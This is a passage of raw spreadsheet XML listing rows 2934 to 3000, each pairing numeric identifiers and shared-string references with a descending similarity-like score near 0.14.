    <row r="2934" ht="15.75" customHeight="1">
      <c r="A2934" s="1">
        <v>10380.0</v>
      </c>
      <c r="B2934" s="2">
        <v>8046147.0</v>
      </c>
      <c r="C2934" s="2" t="s">
        <v>2742</v>
      </c>
      <c r="D2934" s="2">
        <v>1.0</v>
      </c>
      <c r="E2934" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2934" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="2935" ht="15.75" customHeight="1">
      <c r="A2935" s="1">
        <v>2484.0</v>
      </c>
      <c r="B2935" s="2">
        <v>3.3861281E7</v>
      </c>
      <c r="C2935" s="2" t="s">
        <v>2743</v>
      </c>
      <c r="D2935" s="2">
        <v>1.0</v>
      </c>
      <c r="E2935" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2935" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="2936" ht="15.75" customHeight="1">
      <c r="A2936" s="1">
        <v>9337.0</v>
      </c>
      <c r="B2936" s="2">
        <v>5.5635799E7</v>
      </c>
      <c r="C2936" s="2" t="s">
        <v>2744</v>
      </c>
      <c r="D2936" s="2">
        <v>1.0</v>
      </c>
      <c r="E2936" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2936" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="2937" ht="15.75" customHeight="1">
      <c r="A2937" s="1">
        <v>7353.0</v>
      </c>
      <c r="B2937" s="2">
        <v>5.0986361E7</v>
      </c>
      <c r="C2937" s="2" t="s">
        <v>2745</v>
      </c>
      <c r="D2937" s="2">
        <v>1.0</v>
      </c>
      <c r="E2937" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2937" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="2938" ht="15.75" customHeight="1">
      <c r="A2938" s="1">
        <v>8232.0</v>
      </c>
      <c r="B2938" s="2">
        <v>5.3355096E7</v>
      </c>
      <c r="C2938" s="2" t="s">
        <v>2746</v>
      </c>
      <c r="D2938" s="2">
        <v>1.0</v>
      </c>
      <c r="E2938" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2938" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="2939" ht="15.75" customHeight="1">
      <c r="A2939" s="1">
        <v>19349.0</v>
      </c>
      <c r="B2939" s="2">
        <v>5.5387253E7</v>
      </c>
      <c r="C2939" s="2" t="s">
        <v>2747</v>
      </c>
      <c r="D2939" s="2">
        <v>1.0</v>
      </c>
      <c r="E2939" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2939" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="2940" ht="15.75" customHeight="1">
      <c r="A2940" s="1">
        <v>25247.0</v>
      </c>
      <c r="B2940" s="2">
        <v>1.3382049E7</v>
      </c>
      <c r="C2940" s="2" t="s">
        <v>2748</v>
      </c>
      <c r="D2940" s="2">
        <v>1.0</v>
      </c>
      <c r="E2940" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2940" s="2">
        <v>0.1392694063926941</v>
      </c>
    </row>
    <row r="2941" ht="15.75" customHeight="1">
      <c r="A2941" s="1">
        <v>2822.0</v>
      </c>
      <c r="B2941" s="2">
        <v>3.5391091E7</v>
      </c>
      <c r="C2941" s="2" t="s">
        <v>2749</v>
      </c>
      <c r="D2941" s="2">
        <v>1.0</v>
      </c>
      <c r="E2941" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2941" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="2942" ht="15.75" customHeight="1">
      <c r="A2942" s="1">
        <v>8883.0</v>
      </c>
      <c r="B2942" s="2">
        <v>5.4781484E7</v>
      </c>
      <c r="C2942" s="2" t="s">
        <v>2750</v>
      </c>
      <c r="D2942" s="2">
        <v>1.0</v>
      </c>
      <c r="E2942" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2942" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="2943" ht="15.75" customHeight="1">
      <c r="A2943" s="1">
        <v>9442.0</v>
      </c>
      <c r="B2943" s="2">
        <v>5.5815947E7</v>
      </c>
      <c r="C2943" s="2" t="s">
        <v>2751</v>
      </c>
      <c r="D2943" s="2">
        <v>1.0</v>
      </c>
      <c r="E2943" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2943" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="2944" ht="15.75" customHeight="1">
      <c r="A2944" s="1">
        <v>15424.0</v>
      </c>
      <c r="B2944" s="2">
        <v>4.289225E7</v>
      </c>
      <c r="C2944" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="D2944" s="2">
        <v>1.0</v>
      </c>
      <c r="E2944" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2944" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="2945" ht="15.75" customHeight="1">
      <c r="A2945" s="1">
        <v>1645.0</v>
      </c>
      <c r="B2945" s="2">
        <v>2.8032631E7</v>
      </c>
      <c r="C2945" s="2" t="s">
        <v>2753</v>
      </c>
      <c r="D2945" s="2">
        <v>1.0</v>
      </c>
      <c r="E2945" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2945" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="2946" ht="15.75" customHeight="1">
      <c r="A2946" s="1">
        <v>2658.0</v>
      </c>
      <c r="B2946" s="2">
        <v>3.4699121E7</v>
      </c>
      <c r="C2946" s="2" t="s">
        <v>2754</v>
      </c>
      <c r="D2946" s="2">
        <v>1.0</v>
      </c>
      <c r="E2946" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2946" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="2947" ht="15.75" customHeight="1">
      <c r="A2947" s="1">
        <v>10539.0</v>
      </c>
      <c r="B2947" s="2">
        <v>1.2411299E7</v>
      </c>
      <c r="C2947" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="D2947" s="2">
        <v>1.0</v>
      </c>
      <c r="E2947" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2947" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="2948" ht="15.75" customHeight="1">
      <c r="A2948" s="1">
        <v>27236.0</v>
      </c>
      <c r="B2948" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C2948" s="2" t="s">
        <v>2756</v>
      </c>
      <c r="D2948" s="2">
        <v>1.0</v>
      </c>
      <c r="E2948" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2948" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="2949" ht="15.75" customHeight="1">
      <c r="A2949" s="1">
        <v>2874.0</v>
      </c>
      <c r="B2949" s="2">
        <v>3.5636936E7</v>
      </c>
      <c r="C2949" s="2" t="s">
        <v>2757</v>
      </c>
      <c r="D2949" s="2">
        <v>1.0</v>
      </c>
      <c r="E2949" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2949" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="2950" ht="15.75" customHeight="1">
      <c r="A2950" s="1">
        <v>12442.0</v>
      </c>
      <c r="B2950" s="2">
        <v>2.9289557E7</v>
      </c>
      <c r="C2950" s="2" t="s">
        <v>2758</v>
      </c>
      <c r="D2950" s="2">
        <v>1.0</v>
      </c>
      <c r="E2950" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2950" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="2951" ht="15.75" customHeight="1">
      <c r="A2951" s="1">
        <v>16756.0</v>
      </c>
      <c r="B2951" s="2">
        <v>4.7594751E7</v>
      </c>
      <c r="C2951" s="2" t="s">
        <v>2759</v>
      </c>
      <c r="D2951" s="2">
        <v>1.0</v>
      </c>
      <c r="E2951" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2951" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="2952" ht="15.75" customHeight="1">
      <c r="A2952" s="1">
        <v>19974.0</v>
      </c>
      <c r="B2952" s="2">
        <v>5.7583649E7</v>
      </c>
      <c r="C2952" s="2" t="s">
        <v>2760</v>
      </c>
      <c r="D2952" s="2">
        <v>1.0</v>
      </c>
      <c r="E2952" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2952" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="2953" ht="15.75" customHeight="1">
      <c r="A2953" s="1">
        <v>23057.0</v>
      </c>
      <c r="B2953" s="2">
        <v>5.0307335E7</v>
      </c>
      <c r="C2953" s="2" t="s">
        <v>2761</v>
      </c>
      <c r="D2953" s="2">
        <v>1.0</v>
      </c>
      <c r="E2953" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2953" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="2954" ht="15.75" customHeight="1">
      <c r="A2954" s="1">
        <v>28849.0</v>
      </c>
      <c r="B2954" s="2">
        <v>2.9012449E7</v>
      </c>
      <c r="C2954" s="2" t="s">
        <v>2762</v>
      </c>
      <c r="D2954" s="2">
        <v>1.0</v>
      </c>
      <c r="E2954" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2954" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="2955" ht="15.75" customHeight="1">
      <c r="A2955" s="1">
        <v>1175.0</v>
      </c>
      <c r="B2955" s="2">
        <v>2.4632318E7</v>
      </c>
      <c r="C2955" s="2" t="s">
        <v>2763</v>
      </c>
      <c r="D2955" s="2">
        <v>1.0</v>
      </c>
      <c r="E2955" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2955" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2956" ht="15.75" customHeight="1">
      <c r="A2956" s="1">
        <v>2220.0</v>
      </c>
      <c r="B2956" s="2">
        <v>3.2157918E7</v>
      </c>
      <c r="C2956" s="2" t="s">
        <v>2764</v>
      </c>
      <c r="D2956" s="2">
        <v>1.0</v>
      </c>
      <c r="E2956" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2956" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2957" ht="15.75" customHeight="1">
      <c r="A2957" s="1">
        <v>6520.0</v>
      </c>
      <c r="B2957" s="2">
        <v>4.8801535E7</v>
      </c>
      <c r="C2957" s="2" t="s">
        <v>2765</v>
      </c>
      <c r="D2957" s="2">
        <v>1.0</v>
      </c>
      <c r="E2957" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2957" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2958" ht="15.75" customHeight="1">
      <c r="A2958" s="1">
        <v>8200.0</v>
      </c>
      <c r="B2958" s="2">
        <v>5.3278209E7</v>
      </c>
      <c r="C2958" s="2" t="s">
        <v>2766</v>
      </c>
      <c r="D2958" s="2">
        <v>1.0</v>
      </c>
      <c r="E2958" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2958" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2959" ht="15.75" customHeight="1">
      <c r="A2959" s="1">
        <v>11203.0</v>
      </c>
      <c r="B2959" s="2">
        <v>2.0011837E7</v>
      </c>
      <c r="C2959" s="2" t="s">
        <v>2767</v>
      </c>
      <c r="D2959" s="2">
        <v>1.0</v>
      </c>
      <c r="E2959" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2959" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2960" ht="15.75" customHeight="1">
      <c r="A2960" s="1">
        <v>11925.0</v>
      </c>
      <c r="B2960" s="2">
        <v>2.5386345E7</v>
      </c>
      <c r="C2960" s="2" t="s">
        <v>2768</v>
      </c>
      <c r="D2960" s="2">
        <v>1.0</v>
      </c>
      <c r="E2960" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2960" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2961" ht="15.75" customHeight="1">
      <c r="A2961" s="1">
        <v>21352.0</v>
      </c>
      <c r="B2961" s="2">
        <v>2.1316934E7</v>
      </c>
      <c r="C2961" s="2" t="s">
        <v>2769</v>
      </c>
      <c r="D2961" s="2">
        <v>1.0</v>
      </c>
      <c r="E2961" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2961" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="2962" ht="15.75" customHeight="1">
      <c r="A2962" s="1">
        <v>9544.0</v>
      </c>
      <c r="B2962" s="2">
        <v>5.6025054E7</v>
      </c>
      <c r="C2962" s="2" t="s">
        <v>2770</v>
      </c>
      <c r="D2962" s="2">
        <v>1.0</v>
      </c>
      <c r="E2962" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2962" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="2963" ht="15.75" customHeight="1">
      <c r="A2963" s="1">
        <v>11789.0</v>
      </c>
      <c r="B2963" s="2">
        <v>2.4356793E7</v>
      </c>
      <c r="C2963" s="2" t="s">
        <v>2771</v>
      </c>
      <c r="D2963" s="2">
        <v>1.0</v>
      </c>
      <c r="E2963" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2963" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="2964" ht="15.75" customHeight="1">
      <c r="A2964" s="1">
        <v>12130.0</v>
      </c>
      <c r="B2964" s="2">
        <v>2.694134E7</v>
      </c>
      <c r="C2964" s="2" t="s">
        <v>2772</v>
      </c>
      <c r="D2964" s="2">
        <v>1.0</v>
      </c>
      <c r="E2964" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2964" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="2965" ht="15.75" customHeight="1">
      <c r="A2965" s="1">
        <v>5208.0</v>
      </c>
      <c r="B2965" s="2">
        <v>4.4928754E7</v>
      </c>
      <c r="C2965" s="2" t="s">
        <v>2773</v>
      </c>
      <c r="D2965" s="2">
        <v>1.0</v>
      </c>
      <c r="E2965" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2965" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="2966" ht="15.75" customHeight="1">
      <c r="A2966" s="1">
        <v>8217.0</v>
      </c>
      <c r="B2966" s="2">
        <v>5.3328934E7</v>
      </c>
      <c r="C2966" s="2" t="s">
        <v>2774</v>
      </c>
      <c r="D2966" s="2">
        <v>1.0</v>
      </c>
      <c r="E2966" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2966" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="2967" ht="15.75" customHeight="1">
      <c r="A2967" s="1">
        <v>14415.0</v>
      </c>
      <c r="B2967" s="2">
        <v>3.9234187E7</v>
      </c>
      <c r="C2967" s="2" t="s">
        <v>2775</v>
      </c>
      <c r="D2967" s="2">
        <v>1.0</v>
      </c>
      <c r="E2967" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2967" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="2968" ht="15.75" customHeight="1">
      <c r="A2968" s="1">
        <v>15103.0</v>
      </c>
      <c r="B2968" s="2">
        <v>4.1812026E7</v>
      </c>
      <c r="C2968" s="2" t="s">
        <v>2776</v>
      </c>
      <c r="D2968" s="2">
        <v>1.0</v>
      </c>
      <c r="E2968" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2968" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="2969" ht="15.75" customHeight="1">
      <c r="A2969" s="1">
        <v>18251.0</v>
      </c>
      <c r="B2969" s="2">
        <v>5.2164888E7</v>
      </c>
      <c r="C2969" s="2" t="s">
        <v>2777</v>
      </c>
      <c r="D2969" s="2">
        <v>1.0</v>
      </c>
      <c r="E2969" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2969" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="2970" ht="15.75" customHeight="1">
      <c r="A2970" s="1">
        <v>5766.0</v>
      </c>
      <c r="B2970" s="2">
        <v>4.669506E7</v>
      </c>
      <c r="C2970" s="2" t="s">
        <v>2778</v>
      </c>
      <c r="D2970" s="2">
        <v>1.0</v>
      </c>
      <c r="E2970" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2970" s="2">
        <v>0.1377473363774734</v>
      </c>
    </row>
    <row r="2971" ht="15.75" customHeight="1">
      <c r="A2971" s="1">
        <v>2558.0</v>
      </c>
      <c r="B2971" s="2">
        <v>3.4215032E7</v>
      </c>
      <c r="C2971" s="2" t="s">
        <v>2779</v>
      </c>
      <c r="D2971" s="2">
        <v>1.0</v>
      </c>
      <c r="E2971" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2971" s="2">
        <v>0.1376068376068376</v>
      </c>
    </row>
    <row r="2972" ht="15.75" customHeight="1">
      <c r="A2972" s="1">
        <v>6762.0</v>
      </c>
      <c r="B2972" s="2">
        <v>4.9418312E7</v>
      </c>
      <c r="C2972" s="2" t="s">
        <v>2780</v>
      </c>
      <c r="D2972" s="2">
        <v>1.0</v>
      </c>
      <c r="E2972" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2972" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="2973" ht="15.75" customHeight="1">
      <c r="A2973" s="1">
        <v>15064.0</v>
      </c>
      <c r="B2973" s="2">
        <v>4.1709189E7</v>
      </c>
      <c r="C2973" s="2" t="s">
        <v>2781</v>
      </c>
      <c r="D2973" s="2">
        <v>1.0</v>
      </c>
      <c r="E2973" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2973" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="2974" ht="15.75" customHeight="1">
      <c r="A2974" s="1">
        <v>19377.0</v>
      </c>
      <c r="B2974" s="2">
        <v>5.5490333E7</v>
      </c>
      <c r="C2974" s="2" t="s">
        <v>2782</v>
      </c>
      <c r="D2974" s="2">
        <v>1.0</v>
      </c>
      <c r="E2974" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2974" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="2975" ht="15.75" customHeight="1">
      <c r="A2975" s="1">
        <v>11749.0</v>
      </c>
      <c r="B2975" s="2">
        <v>2.4111511E7</v>
      </c>
      <c r="C2975" s="2" t="s">
        <v>2783</v>
      </c>
      <c r="D2975" s="2">
        <v>1.0</v>
      </c>
      <c r="E2975" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2975" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="2976" ht="15.75" customHeight="1">
      <c r="A2976" s="1">
        <v>22006.0</v>
      </c>
      <c r="B2976" s="2">
        <v>2.9812645E7</v>
      </c>
      <c r="C2976" s="2" t="s">
        <v>2784</v>
      </c>
      <c r="D2976" s="2">
        <v>1.0</v>
      </c>
      <c r="E2976" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2976" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="2977" ht="15.75" customHeight="1">
      <c r="A2977" s="1">
        <v>10928.0</v>
      </c>
      <c r="B2977" s="2">
        <v>1.686997E7</v>
      </c>
      <c r="C2977" s="2" t="s">
        <v>2785</v>
      </c>
      <c r="D2977" s="2">
        <v>1.0</v>
      </c>
      <c r="E2977" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2977" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="2978" ht="15.75" customHeight="1">
      <c r="A2978" s="1">
        <v>15651.0</v>
      </c>
      <c r="B2978" s="2">
        <v>4.3624394E7</v>
      </c>
      <c r="C2978" s="2" t="s">
        <v>2786</v>
      </c>
      <c r="D2978" s="2">
        <v>1.0</v>
      </c>
      <c r="E2978" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2978" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="2979" ht="15.75" customHeight="1">
      <c r="A2979" s="1">
        <v>33144.0</v>
      </c>
      <c r="B2979" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C2979" s="2" t="s">
        <v>2787</v>
      </c>
      <c r="D2979" s="2">
        <v>1.0</v>
      </c>
      <c r="E2979" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2979" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="2980" ht="15.75" customHeight="1">
      <c r="A2980" s="1">
        <v>6375.0</v>
      </c>
      <c r="B2980" s="2">
        <v>4.8402931E7</v>
      </c>
      <c r="C2980" s="2" t="s">
        <v>2788</v>
      </c>
      <c r="D2980" s="2">
        <v>1.0</v>
      </c>
      <c r="E2980" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2980" s="2">
        <v>0.1368312757201646</v>
      </c>
    </row>
    <row r="2981" ht="15.75" customHeight="1">
      <c r="A2981" s="1">
        <v>386.0</v>
      </c>
      <c r="B2981" s="2">
        <v>1.6389289E7</v>
      </c>
      <c r="C2981" s="2" t="s">
        <v>2789</v>
      </c>
      <c r="D2981" s="2">
        <v>1.0</v>
      </c>
      <c r="E2981" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2981" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="2982" ht="15.75" customHeight="1">
      <c r="A2982" s="1">
        <v>5564.0</v>
      </c>
      <c r="B2982" s="2">
        <v>4.5999417E7</v>
      </c>
      <c r="C2982" s="2" t="s">
        <v>2790</v>
      </c>
      <c r="D2982" s="2">
        <v>1.0</v>
      </c>
      <c r="E2982" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2982" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="2983" ht="15.75" customHeight="1">
      <c r="A2983" s="1">
        <v>18025.0</v>
      </c>
      <c r="B2983" s="2">
        <v>5.1523016E7</v>
      </c>
      <c r="C2983" s="2" t="s">
        <v>2791</v>
      </c>
      <c r="D2983" s="2">
        <v>1.0</v>
      </c>
      <c r="E2983" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2983" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="2984" ht="15.75" customHeight="1">
      <c r="A2984" s="1">
        <v>14656.0</v>
      </c>
      <c r="B2984" s="2">
        <v>4.0419317E7</v>
      </c>
      <c r="C2984" s="2" t="s">
        <v>2792</v>
      </c>
      <c r="D2984" s="2">
        <v>1.0</v>
      </c>
      <c r="E2984" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2984" s="2">
        <v>0.1366843033509701</v>
      </c>
    </row>
    <row r="2985" ht="15.75" customHeight="1">
      <c r="A2985" s="1">
        <v>2552.0</v>
      </c>
      <c r="B2985" s="2">
        <v>3.4152246E7</v>
      </c>
      <c r="C2985" s="2" t="s">
        <v>2793</v>
      </c>
      <c r="D2985" s="2">
        <v>1.0</v>
      </c>
      <c r="E2985" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2985" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="2986" ht="15.75" customHeight="1">
      <c r="A2986" s="1">
        <v>11202.0</v>
      </c>
      <c r="B2986" s="2">
        <v>1.9939109E7</v>
      </c>
      <c r="C2986" s="2" t="s">
        <v>2794</v>
      </c>
      <c r="D2986" s="2">
        <v>1.0</v>
      </c>
      <c r="E2986" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2986" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="2987" ht="15.75" customHeight="1">
      <c r="A2987" s="1">
        <v>19888.0</v>
      </c>
      <c r="B2987" s="2">
        <v>5.7281098E7</v>
      </c>
      <c r="C2987" s="2" t="s">
        <v>2795</v>
      </c>
      <c r="D2987" s="2">
        <v>1.0</v>
      </c>
      <c r="E2987" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2987" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="2988" ht="15.75" customHeight="1">
      <c r="A2988" s="1">
        <v>19904.0</v>
      </c>
      <c r="B2988" s="2">
        <v>5.7339791E7</v>
      </c>
      <c r="C2988" s="2" t="s">
        <v>2796</v>
      </c>
      <c r="D2988" s="2">
        <v>1.0</v>
      </c>
      <c r="E2988" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2988" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="2989" ht="15.75" customHeight="1">
      <c r="A2989" s="1">
        <v>3842.0</v>
      </c>
      <c r="B2989" s="2">
        <v>4.0209917E7</v>
      </c>
      <c r="C2989" s="2" t="s">
        <v>2797</v>
      </c>
      <c r="D2989" s="2">
        <v>1.0</v>
      </c>
      <c r="E2989" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2989" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="2990" ht="15.75" customHeight="1">
      <c r="A2990" s="1">
        <v>20062.0</v>
      </c>
      <c r="B2990" s="2">
        <v>8453576.0</v>
      </c>
      <c r="C2990" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="D2990" s="2">
        <v>1.0</v>
      </c>
      <c r="E2990" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2990" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="2991" ht="15.75" customHeight="1">
      <c r="A2991" s="1">
        <v>486.0</v>
      </c>
      <c r="B2991" s="2">
        <v>1.7515313E7</v>
      </c>
      <c r="C2991" s="2" t="s">
        <v>2799</v>
      </c>
      <c r="D2991" s="2">
        <v>1.0</v>
      </c>
      <c r="E2991" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2991" s="2">
        <v>0.1364379084967321</v>
      </c>
    </row>
    <row r="2992" ht="15.75" customHeight="1">
      <c r="A2992" s="1">
        <v>18670.0</v>
      </c>
      <c r="B2992" s="2">
        <v>5.3543074E7</v>
      </c>
      <c r="C2992" s="2" t="s">
        <v>2800</v>
      </c>
      <c r="D2992" s="2">
        <v>1.0</v>
      </c>
      <c r="E2992" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2992" s="2">
        <v>0.1364379084967321</v>
      </c>
    </row>
    <row r="2993" ht="15.75" customHeight="1">
      <c r="A2993" s="1">
        <v>26701.0</v>
      </c>
      <c r="B2993" s="2">
        <v>1.8153356E7</v>
      </c>
      <c r="C2993" s="2" t="s">
        <v>2801</v>
      </c>
      <c r="D2993" s="2">
        <v>1.0</v>
      </c>
      <c r="E2993" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2993" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="2994" ht="15.75" customHeight="1">
      <c r="A2994" s="1">
        <v>201.0</v>
      </c>
      <c r="B2994" s="2">
        <v>1.4489779E7</v>
      </c>
      <c r="C2994" s="2" t="s">
        <v>2802</v>
      </c>
      <c r="D2994" s="2">
        <v>1.0</v>
      </c>
      <c r="E2994" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2994" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="2995" ht="15.75" customHeight="1">
      <c r="A2995" s="1">
        <v>7950.0</v>
      </c>
      <c r="B2995" s="2">
        <v>5.2646438E7</v>
      </c>
      <c r="C2995" s="2" t="s">
        <v>2803</v>
      </c>
      <c r="D2995" s="2">
        <v>1.0</v>
      </c>
      <c r="E2995" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2995" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="2996" ht="15.75" customHeight="1">
      <c r="A2996" s="1">
        <v>9850.0</v>
      </c>
      <c r="B2996" s="2">
        <v>5.6696428E7</v>
      </c>
      <c r="C2996" s="2" t="s">
        <v>2804</v>
      </c>
      <c r="D2996" s="2">
        <v>1.0</v>
      </c>
      <c r="E2996" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2996" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="2997" ht="15.75" customHeight="1">
      <c r="A2997" s="1">
        <v>10664.0</v>
      </c>
      <c r="B2997" s="2">
        <v>1.4338183E7</v>
      </c>
      <c r="C2997" s="2" t="s">
        <v>2805</v>
      </c>
      <c r="D2997" s="2">
        <v>1.0</v>
      </c>
      <c r="E2997" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2997" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="2998" ht="15.75" customHeight="1">
      <c r="A2998" s="1">
        <v>13793.0</v>
      </c>
      <c r="B2998" s="2">
        <v>3.6590681E7</v>
      </c>
      <c r="C2998" s="2" t="s">
        <v>2806</v>
      </c>
      <c r="D2998" s="2">
        <v>1.0</v>
      </c>
      <c r="E2998" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2998" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="2999" ht="15.75" customHeight="1">
      <c r="A2999" s="1">
        <v>17119.0</v>
      </c>
      <c r="B2999" s="2">
        <v>4.8770742E7</v>
      </c>
      <c r="C2999" s="2" t="s">
        <v>2807</v>
      </c>
      <c r="D2999" s="2">
        <v>1.0</v>
      </c>
      <c r="E2999" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2999" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="3000" ht="15.75" customHeight="1">
      <c r="A3000" s="1">
        <v>27545.0</v>
      </c>
      <c r="B3000" s="2">
        <v>2.232777E7</v>
      </c>
      <c r="C3000" s="2" t="s">
        <v>2808</v>
      </c>
      <c r="D3000" s="2">
        <v>1.0</v>
      </c>
      <c r="E3000" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3000" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
